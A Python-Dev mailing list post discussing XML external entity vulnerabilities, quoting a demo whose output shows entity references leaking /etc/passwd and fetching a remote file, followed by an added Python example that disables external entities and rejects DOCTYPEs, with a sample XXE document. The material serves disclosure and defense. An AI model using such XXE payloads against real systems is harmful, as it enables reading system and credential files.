[Python-Dev] XML DoS vulnerabilities and exploits in Python

M.-A. Lemburg mal at egenix.com
Sun Feb 24 12:56:33 CET 2013


Reminds me of the encoding attacks that were possible in earlier versions of Python... you could have e.g. an email processing script run the Python test suite by simply sending a specially crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
> On 21.02.2013 11:32, Antoine Pitrou wrote:
>> You haven't proved that these were actual threats, nor how they
>> actually worked. I'm gonna remain skeptical if there isn't anything
>> more precise than "It highly depends on the parser and the application
>> what kind of exploit is possible".
>
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
>
> $ ./python-external.py
>
> REQUEST:
> --------
> Aachen
>
> RESPONSE:
> ---------
> The weather in Aachen is terrible.
>
> REQUEST:
> --------
> ]>
> &passwd;
>
> RESPONSE:
> ---------
> Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi
>
> REQUEST:
> --------
> "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
> ]>
> &url;
>
> RESPONSE:
> ---------
> Unknown city -----BEGIN DH PARAMETERS-----
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -----END DH PARAMETERS-----
>
> These are the 512 bit DH parameters from "Assigned Number for SKIP
> Protocols" (http://www.skip-vpn.org/spec/numbers.html).
> See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a
> safe prime.
>
> Q.E.D.
> Christian

Marc-Andre Lemburg eGenix.com

Professional Python Services directly from the Source (#1, Feb 24 2013)

Python Projects, Consulting and Support ... http://www.egenix.com/
mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/
mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/


::::: Try our mxODBC.Connect Python Database Interface for free ! ::::::

eGenix.com Software, Skills and Services GmbH
Pastor-Loeh-Str.48, D-40764 Langenfeld, Germany.
CEO Dipl.-Math. Marc-Andre Lemburg
Registered at Amtsgericht Duesseldorf: HRB 46611
http://www.egenix.com/company/contact/
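The point of the quoted demo is that a parser left at its defaults resolves whatever an external entity points at, so a `&passwd;` or `&url;` reference in the request ends up in the response. Here is an added example of the defensive side (not code from this thread, from defusedxml, or from CPython itself): a small wrapper around the standard library's xml.sax that fails closed by switching off external general entity resolution and, through a lexical handler, refusing any document that carries a DOCTYPE before an entity can even be declared. The sample documents, the placeholder file path, and the names `parse_untrusted`, `is_rejected`, `RejectDTD` and `TextCollector` are constructed for this example.

```python
"""Added example (not from the thread, defusedxml or CPython): parse XML from
an untrusted source with Python's stdlib xml.sax so that external entities
are never resolved and DOCTYPE-bearing documents are refused outright."""
import io
import xml.sax
import xml.sax.handler


class DTDNotAllowed(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""


class RejectDTD:
    """Lexical handler whose only job is to abort on the first DOCTYPE.

    Entity declarations (external ones that read files or URLs, and the
    internal ones used by entity-expansion bombs) can only live inside a
    DOCTYPE, so refusing the DOCTYPE rules out both classes at once.
    """

    def startDTD(self, name, public_id, system_id):
        raise DTDNotAllowed(
            "DOCTYPE %r (system id %r) not allowed in untrusted input"
            % (name, system_id))

    # expatreader wires up all five lexical callbacks, so the rest must exist.
    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


class TextCollector(xml.sax.handler.ContentHandler):
    """Collect (tag, text) pairs in end-element order; enough for the demo."""

    def __init__(self):
        super().__init__()
        self.elements = []
        self._stack = []

    def startElement(self, name, attrs):
        self._stack.append((name, []))

    def characters(self, content):
        if self._stack:
            self._stack[-1][1].append(content)

    def endElement(self, name):
        tag, parts = self._stack.pop()
        self.elements.append((tag, "".join(parts).strip()))


def parse_untrusted(data, reject_doctype=True):
    """Parse XML bytes from an untrusted source; return [(tag, text), ...].

    External general entities are never resolved, whatever the interpreter's
    default is. With reject_doctype=True (recommended) any DOCTYPE raises
    DTDNotAllowed; with it False an external entity reference expands to
    nothing rather than to file or URL contents.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setFeature(xml.sax.handler.feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    if reject_doctype:
        parser.setProperty(xml.sax.handler.property_lexical_handler,
                           RejectDTD())
    parser.parse(io.BytesIO(data))
    return collector.elements


def is_rejected(data):
    """True when parse_untrusted refuses the document because of its DOCTYPE."""
    try:
        parse_untrusted(data)
    except DTDNotAllowed:
        return True
    return False


# Constructed sample inputs for the example.
BENIGN = b"<request><city>Aachen</city></request>"

# Same shape as the thread's second request, but the entity's system id is a
# deliberately non-existent placeholder path.
WITH_EXTERNAL_ENTITY = (
    b'<?xml version="1.0"?>\n'
    b"<!DOCTYPE request [\n"
    b'  <!ENTITY secret SYSTEM "file:///nonexistent/placeholder.txt">\n'
    b"]>\n"
    b"<request><city>&secret;</city></request>"
)


if __name__ == "__main__":
    print(parse_untrusted(BENIGN))            # [('city', 'Aachen'), ('request', '')]
    print(is_rejected(WITH_EXTERNAL_ENTITY))  # True
    # Even without the DOCTYPE guard the entity expands to nothing.
    print(parse_untrusted(WITH_EXTERNAL_ENTITY, reject_doctype=False))
```

Python 3.7.1 and later already leave `feature_external_ges` off in xml.sax (the fix for bpo-17239), but setting it explicitly documents the intent and covers older interpreters such as the ones this thread was written against. Refusing the DOCTYPE is the stronger guard: it also closes off the internal-entity expansion bombs behind the "DoS" in the subject line, which the feature flag alone does not.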


